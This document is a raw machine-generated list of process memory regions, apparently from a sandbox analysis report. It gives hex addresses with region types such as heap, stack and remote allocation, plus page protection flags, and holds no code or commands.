7DC6000
heap
page read and write
181CD3E0000
trusted library allocation
page read and write
62F3000
unkown
page read and write
181B4575000
heap
page read and write
45DD000
stack
page read and write
C7EC000
unkown
page readonly
7F7C000
unkown
page read and write
16ACBC41000
trusted library allocation
page read and write
7D4D000
heap
page read and write
76A5000
unkown
page read and write
7D99000
heap
page read and write
1DF7B120000
trusted library allocation
page read and write
7DEE000
heap
page read and write
7FF51485C000
unkown
page readonly
A133000
unkown
page readonly
2878000
heap
page read and write
7FFF2E3AC000
unkown
page read and write
7B0000
remote allocation
page read and write
7C77000
heap
page read and write
6CEB000
stack
page read and write
6B02000
heap
page read and write
9F2E000
stack
page read and write
8770000
stack
page read and write
4340000
system
page execute and read and write
23A849E0000
heap
page readonly
8443E7F000
stack
page read and write
5A6000
heap
page read and write
D8EB000
stack
page read and write
16AB9B20000
unkown
page readonly
C50000
trusted library allocation
page execute and read and write
951637F000
stack
page read and write
223E9887000
heap
page read and write
7FF51487E000
unkown
page readonly
20F8C313000
heap
page read and write
1DF7A8D5000
heap
page read and write
48D6000
heap
page read and write
1D785660000
heap
page read and write
95161FD000
stack
page read and write
2814000
heap
page read and write
2700000
system
page execute and read and write
277A000
unkown
page read and write
6B7C000
heap
page read and write
7DCE000
heap
page read and write
181B57C8000
trusted library allocation
page read and write
7AEC000
heap
page read and write
7FFEBFAB0000
trusted library allocation
page read and write
7E41000
heap
page read and write
7FF5148EB000
unkown
page readonly
7FFEBFCB0000
trusted library allocation
page read and write
789C000
unkown
page read and write
1F19BB59000
heap
page read and write
223E7C33000
heap
page read and write
807B000
unkown
page read and write
7FF514B4B000
unkown
page readonly
181CCB9C000
heap
page read and write
223E9883000
heap
page read and write
7FF51477E000
unkown
page readonly
7FFEBFCA0000
trusted library allocation
page read and write
7FF514B74000
unkown
page readonly
7DCA000
heap
page read and write
6AAA000
heap
page read and write
6995000
trusted library allocation
page read and write
7C2A000
heap
page read and write
F8EB000
heap
page read and write
7B63000
heap
page read and write
4732000
heap
page read and write
223E7C33000
heap
page read and write
C5C8000
unkown
page readonly
95162FD000
stack
page read and write
1F19B0FA000
heap
page read and write
7D30000
heap
page read and write
2B4C000
heap
page read and write
5318000
unkown
page read and write
71F0000
trusted library allocation
page read and write
5161000
unkown
page read and write
2879000
heap
page read and write
4798000
heap
page read and write
7E52000
heap
page read and write
44C2000
heap
page read and write
7E3A000
heap
page read and write
7FF514B68000
unkown
page readonly
7FF514842000
unkown
page readonly
117E5000
stack
page read and write
181CCFD0000
trusted library allocation
page read and write
FCF6000
heap
page read and write
293E000
stack
page read and write
6B14000
heap
page read and write
68B76FF000
stack
page read and write
7FFF2E40F000
unkown
page readonly
3304000
heap
page read and write
7FFF295ED000
unkown
page write copy
EAA6000
unkown
page read and write
8226000
unkown
page read and write
7B4B000
heap
page read and write
1DF7AC90000
heap
page read and write
C527000
unkown
page readonly
181CD412000
trusted library allocation
page read and write
7E41000
heap
page read and write
821A000
unkown
page read and write
181CCC60000
trusted library allocation
page read and write
1FD1C2DE000
trusted library allocation
page read and write
7FF514660000
unkown
page readonly
7C56000
heap
page read and write
20A3FB10000
heap
page read and write
223EB3D8000
heap
page read and write
E71C000
unkown
page read and write
80FC000
unkown
page read and write
7FF514B39000
unkown
page readonly
81C000
heap
page read and write
6B5E000
heap
page read and write
1F1A0660000
trusted library allocation
page read and write
DB56000
unkown
page read and write
7FF5144BA000
unkown
page readonly
7F9D000
unkown
page read and write
3F0000
unkown
page readonly
68B7DBC000
stack
page read and write
181CD550000
trusted library allocation
page read and write
480C000
unkown
page read and write
66A0000
trusted library allocation
page read and write
7FFEBFA83000
trusted library allocation
page execute and read and write
1D786510000
trusted library allocation
page read and write
181CCFD0000
trusted library allocation
page read and write
48A9000
heap
page read and write
60B0000
unkown
page read and write
7DEA000
heap
page read and write
7B4F000
heap
page read and write
9E0000
unkown
page readonly
7D5F000
heap
page read and write
16ABC9A3000
trusted library allocation
page read and write
7B6A000
heap
page read and write
1F1A08D0000
remote allocation
page read and write
1F9E000
stack
page read and write
7B0000
remote allocation
page read and write
2ACE000
stack
page read and write
6F00000
trusted library allocation
page read and write
7D30000
heap
page read and write
8A0000
heap
page read and write
4290000
unkown
page read and write
66E0000
trusted library allocation
page read and write
62AD000
unkown
page read and write
B8E47CE000
stack
page read and write
FA65000
heap
page read and write
7D6A000
heap
page read and write
7E45000
heap
page read and write
3ED3000
unkown
page read and write
7FF4F5B30000
unkown
page readonly
193F2A56000
heap
page read and write
FC6A000
heap
page read and write
7BE0000
heap
page read and write
468A000
stack
page read and write
1FD1B010000
trusted library allocation
page read and write
181CD490000
trusted library allocation
page read and write
1DF78E40000
unkown
page readonly
1F1A08A0000
trusted library allocation
page read and write
DBEC000
stack
page read and write
7E10000
heap
page read and write
7C9E000
heap
page read and write
441C000
stack
page read and write
181CD3D0000
trusted library allocation
page read and write
966F000
stack
page read and write
7DF0000
heap
page read and write
20A417D2000
heap
page read and write
2B19000
heap
page read and write
7DD9000
heap
page read and write
1FD1B010000
trusted library allocation
page read and write
52E0000
unkown
page read and write
4EEB000
stack
page read and write
5AD000
heap
page read and write
10AF0000
heap
page read and write
181CD4A0000
trusted library allocation
page read and write
2776000
unkown
page read and write
7B57000
heap
page read and write
4918000
heap
page read and write
7E6E000
stack
page read and write
6AA8000
heap
page read and write
6B25000
heap
page read and write
1DF7AE24000
trusted library allocation
page read and write
7C36000
heap
page read and write
9D5000
heap
page read and write
23A9D120000
trusted library allocation
page read and write
7FF514BCC000
unkown
page readonly
E6EF000
unkown
page read and write
46CA000
system
page read and write
410C000
stack
page read and write
7FFEBFC80000
trusted library allocation
page execute and read and write
223E9A7E000
heap
page read and write
7FFEBFC70000
trusted library allocation
page execute and read and write
7FF5149E7000
unkown
page readonly
7FF514BD4000
unkown
page readonly
7DEC000
heap
page read and write
7E5F000
heap
page read and write
7A91000
heap
page read and write
23A9CEF0000
trusted library allocation
page read and write
7FFF2E3AE000
unkown
page read and write
7C2A000
heap
page read and write
AB356FE000
stack
page read and write
7D2A000
heap
page read and write
48AB000
heap
page read and write
7E00000
heap
page read and write
74AE000
unkown
page readonly
7C7B000
heap
page read and write
7B5B000
heap
page read and write
116ED000
stack
page read and write
7FF514B93000
unkown
page readonly
CD25000
unkown
page readonly
7DEA000
heap
page read and write
2403000
heap
page read and write
75DC000
unkown
page readonly
156BEBC0000
heap
page read and write
7FF514B51000
unkown
page readonly
951724D000
stack
page read and write
7BE0000
heap
page read and write
7B81000
heap
page read and write
7FF514BC2000
unkown
page readonly
2AF0000
unkown
page read and write
8A8D000
unkown
page read and write
5820000
unkown
page readonly
16ABBAA0000
heap
page execute and read and write
FBB1000
heap
page read and write
1FD19650000
trusted library allocation
page read and write
181B2A50000
heap
page read and write
16AB9F50000
trusted library allocation
page read and write
EEFA000
unkown
page read and write
181CD3D0000
trusted library section
page read and write
7C2F000
heap
page read and write
16AB9BF8000
heap
page read and write
27EA000
system
page read and write
97D0000
unkown
page readonly
6A60000
trusted library allocation
page read and write
536C000
unkown
page read and write
44CF000
heap
page read and write
7E10000
heap
page read and write
7DC6000
heap
page read and write
7D71000
heap
page read and write
2A0F000
trusted library allocation
page execute and read and write
531E000
unkown
page read and write
1196C000
stack
page read and write
488F000
heap
page read and write
2ED0000
heap
page read and write
E101000
unkown
page read and write
DB2E000
unkown
page read and write
2360000
unkown
page read and write
B1EA000
stack
page read and write
7FF514980000
unkown
page readonly
E060000
unkown
page read and write
181CCDFE000
heap
page read and write
BAEF000
stack
page read and write
43B75FD000
stack
page read and write
1C80BD10000
heap
page read and write
FCEC000
heap
page read and write
2C30000
unkown
page read and write
7FFF2E2B3000
unkown
page read and write
1E9DD7B0000
heap
page read and write
6AAA000
heap
page read and write
2373000
heap
page read and write
1094D000
heap
page read and write
9BEE000
stack
page read and write
710000
heap
page read and write
2310000
unkown
page read and write
7D64000
heap
page read and write
F7C6000
heap
page read and write
84A000
heap
page read and write
EAA6000
unkown
page read and write
435D000
unkown
page read and write
7C1B000
heap
page read and write
6AA0000
heap
page read and write
CAB000
heap
page read and write
9EAD000
stack
page read and write
1C80BED0000
heap
page read and write
7D23000
heap
page read and write
7B57000
heap
page read and write
56B000
heap
page read and write
3B50000
heap
page read and write
3EF0000
unkown
page read and write
7FF514A9B000
unkown
page readonly
1E9DD7A5000
heap
page read and write
7A90000
heap
page read and write
E7000
stack
page read and write
7227000
unkown
page readonly
E092000
unkown
page read and write
7FFEBFB5C000
trusted library allocation
page execute and read and write
92E000
heap
page read and write
7D5F000
heap
page read and write
1D78565E000
heap
page read and write
DF10000
heap
page read and write
7FFF2E211000
unkown
page execute read
532E000
unkown
page read and write
51D0000
unkown
page readonly
181CD570000
trusted library allocation
page read and write
863000
heap
page read and write
FCEF000
heap
page read and write
7E85000
heap
page read and write
218C8202000
heap
page read and write
7DC6000
heap
page read and write
D74E000
unkown
page execute and read and write
7B4B000
heap
page read and write
7B0D000
heap
page read and write
1DF7ADD0000
heap
page execute and read and write
7FF514444000
unkown
page readonly
890000
heap
page read and write
16ABBBF2000
heap
page read and write
7FFF2E417000
unkown
page readonly
3ED0000
trusted library section
page read and write
24204C4E000
heap
page read and write
29E7000
system
page read and write
7B16000
heap
page read and write
2DC8000
stack
page read and write
24204C00000
heap
page read and write
7FF514B33000
unkown
page readonly
7B6A000
heap
page read and write
F80000
heap
page read and write
20F8C274000
heap
page read and write
550000
heap
page read and write
6AA8000
heap
page read and write
A3F000
stack
page read and write
7B52000
heap
page read and write
156BEC05000
heap
page read and write
7B57000
heap
page read and write
1F9E000
stack
page read and write
DB20000
unkown
page read and write
E7000
stack
page read and write
76AB000
unkown
page read and write
7FF514AB1000
unkown
page readonly
E200000
unkown
page read and write
1F1A0A00000
heap
page read and write
2100000
heap
page read and write
D2B8000
heap
page read and write
7C2A000
heap
page read and write
488C000
unkown
page read and write
7B4B000
heap
page read and write
7C21000
heap
page read and write
9F4E000
unkown
page readonly
F871000
heap
page read and write
4918000
heap
page read and write
1F19BB02000
heap
page read and write
1E9DD786000
heap
page read and write
2050000
stack
page readonly
6AA9000
stack
page read and write
69D5000
trusted library allocation
page read and write
20A416D0000
heap
page read and write
F70A000
heap
page read and write
4260000
trusted library section
page read and write
1FD1CA22000
trusted library allocation
page read and write
16ABBBFC000
heap
page read and write
7FF5147BD000
unkown
page readonly
28B0000
unkown
page read and write
31FB000
stack
page read and write
DB30000
unkown
page read and write
7E53000
heap
page read and write
AFB000
stack
page read and write
74C3000
unkown
page readonly
A96C000
stack
page read and write
2340000
unkown
page read and write
23A9CF20000
heap
page read and write
AB3567D000
stack
page read and write
7B4B000
heap
page read and write
7FFEBFC62000
trusted library allocation
page read and write
789E000
unkown
page read and write
109E4000
heap
page read and write
D70000
unkown
page readonly
79EF000
stack
page read and write
7DC8000
heap
page read and write
536C000
unkown
page read and write
445F000
heap
page read and write
7DCE000
heap
page read and write
2A38000
stack
page read and write
7A98000
heap
page read and write
1FD194CC000
heap
page read and write
181CD470000
trusted library allocation
page read and write
7B16000
heap
page read and write
F36E000
stack
page read and write
7FFEBFCC5000
trusted library allocation
page read and write
7FFEBFDD0000
trusted library allocation
page read and write
7FF514655000
unkown
page readonly
7CC3000
heap
page read and write
48AC000
unkown
page read and write
7FF51487E000
unkown
page readonly
7DBC000
heap
page read and write
7FF514BA9000
unkown
page readonly
7ACA000
heap
page read and write
223E9A7C000
heap
page read and write
DB58000
unkown
page read and write
16ABBBEF000
heap
page read and write
16ABBA70000
trusted library allocation
page read and write
27A8000
unkown
page read and write
7FFEBFCB0000
trusted library allocation
page read and write
7D72000
heap
page read and write
16ABBC41000
trusted library allocation
page read and write
7FF51481C000
unkown
page readonly
181CCC15000
heap
page read and write
7DF4BD4E0000
trusted library allocation
page execute and read and write
2834000
unkown
page read and write
F8DF000
heap
page read and write
D86B000
stack
page read and write
1F1A077E000
trusted library allocation
page read and write
16ABBB00000
heap
page read and write
7CC8000
heap
page read and write
30000
unkown
page read and write
181B5EB0000
trusted library allocation
page read and write
7ABC000
heap
page read and write
223E7C2E000
heap
page read and write
7FFEBFD90000
trusted library allocation
page read and write
7DF446140000
trusted library allocation
page readonly
5AD000
heap
page read and write
F886000
heap
page read and write
29D6000
stack
page read and write
181B5F6C000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
906000
heap
page read and write
950A000
unkown
page read and write
287E000
heap
page read and write
FB0B000
heap
page read and write
1E9DD74E000
heap
page read and write
7DF4736B0000
trusted library allocation
page execute and read and write
E759000
unkown
page read and write
7FF5148CA000
unkown
page readonly
16AB9C4C000
heap
page read and write
E7000
stack
page read and write
70B3000
trusted library allocation
page read and write
156BEB40000
heap
page read and write
41C1000
heap
page read and write
57C0000
unkown
page read and write
16AD4020000
trusted library allocation
page read and write
FAFE000
heap
page read and write
1FD1C9F6000
trusted library allocation
page read and write
23A82D1C000
heap
page read and write
69F0000
trusted library allocation
page read and write
24204C4C000
heap
page read and write
7905000
unkown
page read and write
7BB9000
heap
page read and write
4203000
heap
page read and write
490000
stack
page readonly
7D36000
heap
page read and write
27E3000
heap
page read and write
A10000
unkown
page read and write
910A000
unkown
page read and write
223E7BFF000
heap
page read and write
480000
heap
page read and write
60B0000
unkown
page read and write
2A38000
stack
page read and write
2300000
unkown
page readonly
7FFEBFDD0000
trusted library allocation
page read and write
D34F47B000
stack
page read and write
9876000
heap
page read and write
7B63000
heap
page read and write
7FFEBFDC0000
trusted library allocation
page read and write
7FF514679000
unkown
page readonly
3465000
heap
page read and write
109F5000
heap
page read and write
1FD1C0C7000
trusted library allocation
page read and write
8F4000
heap
page read and write
72DE000
unkown
page readonly
C80000
system
page execute and read and write
22FE000
stack
page read and write
7FF514B4B000
unkown
page readonly
CAFB000
unkown
page read and write
1E9DCF13000
heap
page read and write
7DF2000
heap
page read and write
16ABBBEF000
heap
page read and write
7FFEBFD70000
trusted library allocation
page read and write
2778000
system
page execute and read and write
465C000
stack
page read and write
446E000
heap
page read and write
7E0E000
heap
page read and write
7B52000
heap
page read and write
A267000
unkown
page readonly
7D62000
heap
page read and write
223E7970000
heap
page read and write
7F8D000
unkown
page read and write
7DFC000
heap
page read and write
935000
heap
page read and write
7FFEBFCA0000
trusted library allocation
page read and write
181B5F64000
trusted library allocation
page read and write
57D0000
unkown
page readonly
2400000
heap
page read and write
7C23000
heap
page read and write
7DCE000
heap
page read and write
294F000
stack
page read and write
B8E517F000
unkown
page read and write
7CDA000
heap
page read and write
1FD1AF70000
trusted library allocation
page read and write
7FF51483F000
unkown
page readonly
8235000
unkown
page read and write
F07A000
unkown
page read and write
16ABD2FE000
trusted library allocation
page read and write
B169000
stack
page read and write
1DF10010000
trusted library allocation
page read and write
7ACD000
heap
page read and write
44C8000
heap
page read and write
4160000
unkown
page read and write
223E98F6000
heap
page read and write
9A60000
unkown
page readonly
7E6B000
heap
page read and write
9F11000
unkown
page readonly
7FF514B28000
unkown
page readonly
2B10000
unkown
page readonly
720000
unkown
page readonly
7FFEBFDC0000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
1C80DDE4000
heap
page read and write
48D6000
heap
page read and write
7DC6000
heap
page read and write
FC65000
heap
page read and write
4E0000
unkown
page read and write
7FFEBFA8D000
trusted library allocation
page execute and read and write
82ED000
stack
page read and write
7E0E000
heap
page read and write
EFFE000
unkown
page read and write
7FF5147B1000
unkown
page readonly
4347000
unkown
page read and write
2819000
unkown
page read and write
22E1B360000
trusted library allocation
page read and write
F8ED000
heap
page read and write
7D99000
heap
page read and write
D20F000
stack
page read and write
70D0000
trusted library allocation
page read and write
7DDB000
heap
page read and write
490E000
heap
page read and write
1D78567D000
heap
page read and write
7F87000
unkown
page read and write
66B0000
trusted library allocation
page read and write
7FFF2E40F000
unkown
page readonly
7DEE000
heap
page read and write
757C000
unkown
page readonly
46C0000
unkown
page read and write
906000
heap
page read and write
7DFA000
heap
page read and write
4E6C000
stack
page read and write
9D0000
heap
page read and write
DB20000
unkown
page read and write
F8CE000
heap
page read and write
B74000
heap
page read and write
2276000
stack
page read and write
E7000
stack
page read and write
9F2E000
stack
page read and write
7FFF2E31F000
unkown
page readonly
F7A9000
heap
page read and write
4500000
unkown
page read and write
24CE000
stack
page read and write
284F000
heap
page read and write
FA63000
heap
page read and write
27F7000
unkown
page read and write
F8FB000
heap
page read and write
43B777C000
stack
page read and write
28B0000
unkown
page read and write
763C98E000
stack
page read and write
24CE000
stack
page read and write
1E9DCEAC000
heap
page read and write
1F19BB59000
heap
page read and write
23A84670000
heap
page read and write
23A9CEF1000
trusted library allocation
page read and write
181CCFD0000
trusted library allocation
page read and write
6AE0000
heap
page read and write
7FF514A64000
unkown
page readonly
7FF514B2B000
unkown
page readonly
6B03000
heap
page read and write
7C25000
heap
page read and write
7FFF2E327000
unkown
page readonly
76C3000
unkown
page read and write
6E1B000
unkown
page readonly
1D24DFF000
stack
page read and write
223E9911000
heap
page read and write
7C21000
heap
page read and write
D17A000
unkown
page read and write
980A000
heap
page read and write
6AD8000
heap
page read and write
181CCC70000
trusted library allocation
page read and write
7FFF2E2C3000
unkown
page readonly
10899000
heap
page read and write
181CD3E0000
trusted library allocation
page read and write
7FF51440E000
unkown
page readonly
7DEC000
heap
page read and write
7C9F000
heap
page read and write
7B57000
heap
page read and write
7DF2000
heap
page read and write
F637000
heap
page read and write
27F7000
unkown
page read and write
4060000
trusted library section
page read and write
1D785680000
heap
page read and write
DB58000
unkown
page read and write
7DF4000
heap
page read and write
1FD1B010000
trusted library allocation
page read and write
1C80E075000
heap
page read and write
F8E7000
heap
page read and write
1FD33795000
heap
page read and write
1FD1C1F1000
trusted library allocation
page read and write
F871000
heap
page read and write
7FF514C8D000
unkown
page readonly
FBA9000
heap
page read and write
7C13000
heap
page read and write
2F4E000
trusted library allocation
page read and write
47B3000
heap
page read and write
820000
heap
page read and write
109E9000
heap
page read and write
4B2B000
stack
page read and write
F080000
unkown
page read and write
4BA8000
stack
page read and write
181CD3F0000
trusted library allocation
page read and write
1DF7A880000
trusted library allocation
page read and write
1FD1CC24000
trusted library allocation
page read and write
275E000
unclassified section
page execute and read and write
7FF514727000
unkown
page readonly
7D5E000
heap
page read and write
7FFEBFD50000
trusted library allocation
page read and write
275F000
stack
page read and write
C34F000
stack
page read and write
1E9DD796000
heap
page read and write
1FD1C4AC000
trusted library allocation
page read and write
7B57000
heap
page read and write
7D08000
heap
page read and write
708D000
stack
page read and write
5D0000
heap
page read and write
6B14000
heap
page read and write
3476000
heap
page read and write
9DCD000
unkown
page readonly
16ABBBF7000
heap
page read and write
223E7D9D000
heap
page read and write
16AD3E10000
trusted library allocation
page read and write
28B0000
unkown
page read and write
1D2523C000
stack
page read and write
6B93000
heap
page read and write
3304000
heap
page read and write
7C34000
heap
page read and write
7C1B000
heap
page read and write
F8DD000
heap
page read and write
6990000
trusted library allocation
page read and write
5820000
unkown
page readonly
7CE6000
heap
page read and write
6AF2000
heap
page read and write
23A9CC98000
heap
page read and write
8443F7E000
stack
page read and write
7A57000
heap
page read and write
1F19AF60000
heap
page read and write
906D000
stack
page read and write
8216000
unkown
page read and write
630000
unkown
page readonly
F7DE000
heap
page read and write
5E90000
trusted library allocation
page read and write
7E40000
heap
page read and write
427A000
stack
page read and write
6CD0000
trusted library allocation
page read and write
7DCA000
heap
page read and write
25B1000
heap
page read and write
7FFEBFB46000
trusted library allocation
page read and write
7B91000
heap
page read and write
B1E8000
stack
page read and write
16AD3E42000
heap
page read and write
60B0000
unkown
page read and write
F7B9000
heap
page read and write
16AB9B60000
heap
page read and write
6CC5000
trusted library allocation
page read and write
7DD7000
heap
page read and write
7DF8000
heap
page read and write
7C21000
heap
page read and write
730F000
unkown
page readonly
8183000
unkown
page read and write
1FD1CA08000
trusted library allocation
page read and write
2881000
unkown
page read and write
2B29000
stack
page read and write
E770000
unkown
page read and write
3FE0000
unkown
page read and write
DC6B000
stack
page read and write
7E1A000
heap
page read and write
A133000
unkown
page readonly
25E9000
stack
page read and write
4000000
unkown
page read and write
477B000
heap
page read and write
156BED90000
heap
page read and write
7C27000
heap
page read and write
79EF000
stack
page read and write
7FF514710000
unkown
page readonly
A43E000
stack
page read and write
CDF3000
unkown
page readonly
218C8213000
heap
page read and write
7FFF2E2F9000
unkown
page readonly
7DF4460E1000
trusted library allocation
page execute read
7590000
trusted library allocation
page read and write
2B06000
stack
page read and write
43C0000
trusted library allocation
page read and write
7FF51465A000
unkown
page readonly
7FF5146D0000
unkown
page readonly
16ABBE51000
trusted library allocation
page read and write
4CAE000
stack
page read and write
7FFEBFD80000
trusted library allocation
page read and write
F883000
heap
page read and write
473F000
heap
page read and write
6D10000
trusted library allocation
page read and write
4340000
system
page execute and read and write
7FFEBFD90000
trusted library allocation
page read and write
810E000
stack
page read and write
5780000
trusted library section
page readonly
7FF514B18000
unkown
page readonly
431F000
unkown
page read and write
7E34000
heap
page read and write
8A5000
heap
page read and write
7FFEBFCD0000
trusted library allocation
page read and write
488F000
heap
page read and write
7FF514992000
unkown
page readonly
1C80DD63000
heap
page read and write
1F19C600000
trusted library allocation
page read and write
9A8E000
unkown
page readonly
7FFEBFDF0000
trusted library allocation
page read and write
F3FB000
unkown
page read and write
223E988F000
heap
page read and write
E740000
unkown
page read and write
7FF514666000
unkown
page readonly
6E87000
stack
page read and write
223E989B000
heap
page read and write
223E98E1000
heap
page read and write
16ABBBBA000
heap
page read and write
F7BB000
heap
page read and write
B96F000
stack
page read and write
23A82DB0000
heap
page read and write
7FF5146E4000
unkown
page readonly
21CA000
stack
page read and write
7E08000
heap
page read and write
7DE0000
heap
page read and write
7DFA000
heap
page read and write
7FF51473F000
unkown
page readonly
48B3000
unkown
page read and write
75CE000
unkown
page readonly
7D0A000
heap
page read and write
5116000
stack
page read and write
4720000
unkown
page read and write
7FF514853000
unkown
page readonly
E279000
unkown
page read and write
7E34000
heap
page read and write
6B14000
heap
page read and write
EA24000
unkown
page read and write
7E3C000
heap
page read and write
7C85000
heap
page read and write
29C9000
stack
page read and write
7FF514837000
unkown
page readonly
223E7C33000
heap
page read and write
F2FF000
unkown
page read and write
F06F000
stack
page read and write
8D8D000
unkown
page read and write
1E9DD718000
heap
page read and write
7FF51473F000
unkown
page readonly
7A96000
heap
page read and write
43B747A000
stack
page read and write
4180000
unkown
page read and write
287A000
heap
page read and write
181CCB42000
heap
page read and write
4160000
unkown
page read and write
223E98A5000
heap
page read and write
7FFEBFA90000
trusted library allocation
page read and write
2877000
heap
page read and write
44C2000
heap
page read and write
465C000
stack
page read and write
7B4B000
heap
page read and write
1F19C180000
trusted library allocation
page read and write
69E0000
trusted library allocation
page read and write
3304000
heap
page read and write
4347000
unkown
page read and write
2B7D000
heap
page read and write
7DF446130000
trusted library allocation
page readonly
E7000
stack
page read and write
4C2E000
stack
page read and write
7E10000
heap
page read and write
916D000
stack
page read and write
7ACA000
heap
page read and write
223E98A1000
heap
page read and write
7D5F000
heap
page read and write
20A41C80000
heap
page read and write
156BEBD6000
heap
page read and write
653E000
stack
page read and write
1C80BD30000
heap
page read and write
7E02000
heap
page read and write
1D785790000
heap
page readonly
181B60E6000
trusted library allocation
page read and write
7FFF2E3AA000
unkown
page read and write
C97A000
unkown
page read and write
7B60000
heap
page read and write
92ED000
stack
page read and write
69B3000
trusted library allocation
page read and write
7DCE000
heap
page read and write
2700000
system
page execute and read and write
6B5E000
heap
page read and write
7715000
unkown
page read and write
42A0000
unkown
page read and write
7FF514B8E000
unkown
page readonly
4250000
trusted library allocation
page read and write
775000
heap
page read and write
7FF514AC1000
unkown
page readonly
7B81000
heap
page read and write
FAF1000
heap
page read and write
A275000
unkown
page readonly
7B52000
heap
page read and write
1F1A0650000
trusted library allocation
page read and write
6B5E000
heap
page read and write
7DEA000
heap
page read and write
1176B000
stack
page read and write
4E0000
heap
page read and write
6CE0000
trusted library allocation
page read and write
E748000
unkown
page read and write
23A82D6E000
heap
page read and write
23A84F06000
trusted library allocation
page read and write
7E12000
heap
page read and write
97C6000
heap
page read and write
7FF514A26000
unkown
page readonly
16AD3E20000
heap
page read and write
7FF514650000
unkown
page readonly
7FFEBFDD0000
trusted library allocation
page read and write
70D0000
trusted library allocation
page read and write
295E000
stack
page read and write
27A5000
heap
page read and write
75CE000
unkown
page readonly
F866000
heap
page read and write
7FF514BFC000
unkown
page readonly
2300000
unkown
page readonly
181CD3E0000
trusted library allocation
page read and write
223E7C33000
heap
page read and write
70A0000
trusted library allocation
page read and write
6AA8000
heap
page read and write
7FF5148EF000
unkown
page readonly
7B81000
heap
page read and write
4BA8000
stack
page read and write
7C2A000
heap
page read and write
7D5A000
heap
page read and write
F6FB000
heap
page read and write
1DF7A840000
heap
page read and write
760C000
unkown
page readonly
5296000
stack
page read and write
7AD0000
heap
page read and write
77EA000
stack
page read and write
181CD560000
trusted library allocation
page read and write
41CC000
heap
page read and write
7B63000
heap
page read and write
7FFEBFDF0000
trusted library allocation
page read and write
7DE4000
heap
page read and write
C853000
unkown
page readonly
76B8000
unkown
page read and write
4C2E000
stack
page read and write
E0B9000
unkown
page read and write
6AA8000
heap
page read and write
912000
heap
page read and write
D70000
unkown
page readonly
5800000
trusted library allocation
page read and write
7B4F000
heap
page read and write
7FF5148FF000
unkown
page readonly
73FA000
unkown
page readonly
7C2A000
heap
page read and write
FAEE000
heap
page read and write
7FF514BC5000
unkown
page readonly
80EE000
unkown
page read and write
26D8000
stack
page read and write
A76E000
stack
page read and write
CB85000
unkown
page readonly
976E000
stack
page read and write
2B9B000
trusted library allocation
page execute and read and write
41FA000
stack
page read and write
20F8C140000
heap
page read and write
7FF514512000
unkown
page readonly
1E9DDBA0000
remote allocation
page read and write
898D000
unkown
page read and write
4911000
heap
page read and write
F907000
heap
page read and write
6A9D000
heap
page read and write
7C1D000
heap
page read and write
1FD1AF40000
heap
page read and write
2740000
unkown
page read and write
AB1CEFE000
stack
page read and write
7FFEBFAA4000
trusted library allocation
page read and write
16ABBB6E000
heap
page read and write
DB5000
heap
page read and write
7FF514B9F000
unkown
page readonly
4710000
unkown
page read and write
7FF514BBD000
unkown
page readonly
7C36000
heap
page read and write
6CB0000
trusted library allocation
page read and write
7D5B000
heap
page read and write
23A9CF00000
trusted library allocation
page read and write
F584000
heap
page read and write
1F19B980000
trusted library section
page read and write
CC9A000
unkown
page readonly
9488000
unkown
page read and write
2990000
unkown
page readonly
C8FA000
unkown
page read and write
F866000
heap
page read and write
10B9A000
heap
page read and write
9515D8E000
stack
page read and write
48F6000
heap
page read and write
10AEF000
heap
page read and write
66A8000
stack
page read and write
7C34000
heap
page read and write
2DCB000
stack
page read and write
7FF514A4E000
unkown
page readonly
41B6000
heap
page read and write
480000
heap
page read and write
ADEF000
stack
page read and write
825E000
unkown
page read and write
6BBE000
heap
page read and write
D6A0000
unkown
page execute and read and write
7B63000
heap
page read and write
16ABC99B000
trusted library allocation
page read and write
7F89000
unkown
page read and write
68B797F000
stack
page read and write
181CD500000
trusted library allocation
page read and write
822E000
unkown
page read and write
223E9922000
heap
page read and write
7DE0000
heap
page read and write
4BA8000
stack
page read and write
20F8C200000
heap
page read and write
7FF51465A000
unkown
page readonly
223E7C2A000
heap
page read and write
29E7000
system
page read and write
6EC0000
trusted library allocation
page read and write
F901000
heap
page read and write
7A91000
heap
page read and write
6AA0000
heap
page read and write
4079000
stack
page read and write
7C13000
heap
page read and write
E6CE000
unkown
page read and write
7FF514BC2000
unkown
page readonly
1D78565D000
heap
page read and write
7FF5146D0000
unkown
page readonly
7FF51465D000
unkown
page readonly
278E000
stack
page read and write
7CE000
heap
page read and write
7DEC000
heap
page read and write
2373000
heap
page read and write
2DD8000
unclassified section
page execute and read and write
7FFF2E211000
unkown
page execute read
4680000
unkown
page readonly
7B5B000
heap
page read and write
7FFF2E210000
unkown
page readonly
BB1000
trusted library allocation
page read and write
7FFEBFA9D000
trusted library allocation
page execute and read and write
D9EE000
stack
page read and write
7E0C000
heap
page read and write
7FF5146BE000
unkown
page readonly
27B7000
unkown
page read and write
720C000
stack
page read and write
7485000
unkown
page readonly
16ABB720000
heap
page read and write
7D4D000
heap
page read and write
23A9CC81000
heap
page read and write
7FFEBFCC5000
trusted library allocation
page read and write
223E7BFF000
heap
page read and write
3FE0000
unkown
page read and write
D74E000
unkown
page execute and read and write
F6E4000
heap
page read and write
CE99000
unkown
page readonly
9841000
heap
page read and write
609000
heap
page read and write
7B0D000
heap
page read and write
1E9DDC02000
heap
page read and write
7E85000
heap
page read and write
1F19B870000
trusted library allocation
page read and write
7FF514A13000
unkown
page readonly
7FF5144EC000
unkown
page readonly
790A000
stack
page read and write
7B63000
heap
page read and write
181CCB9C000
heap
page read and write
B169000
stack
page read and write
1F1A0840000
trusted library allocation
page read and write
FBB9000
heap
page read and write
7BE6000
heap
page read and write
97D3000
heap
page read and write
181CCE24000
heap
page read and write
7FF5144BA000
unkown
page readonly
10962000
heap
page read and write
88AB97F000
stack
page read and write
B8E4A7E000
stack
page read and write
F47B000
unkown
page read and write
223E7BFD000
heap
page read and write
1D785610000
heap
page read and write
7FF51486B000
unkown
page readonly
4000000
trusted library section
page read and write
1F9E000
stack
page read and write
7B52000
heap
page read and write
9A0000
unkown
page readonly
7FF514ADB000
unkown
page readonly
7B63000
heap
page read and write
181CD480000
trusted library allocation
page read and write
6C0000
unkown
page readonly
7B4F000
heap
page read and write
2BB9000
stack
page read and write
84EC000
stack
page read and write
66D0000
trusted library allocation
page read and write
4280000
unkown
page readonly
46B0000
unkown
page readonly
6AC5000
heap
page read and write
1DF00BA3000
trusted library allocation
page read and write
763B97D000
stack
page read and write
7D77000
heap
page read and write
10C04000
heap
page read and write
2373000
heap
page read and write
7E02000
heap
page read and write
1D785714000
trusted library allocation
page read and write
4DB0000
unkown
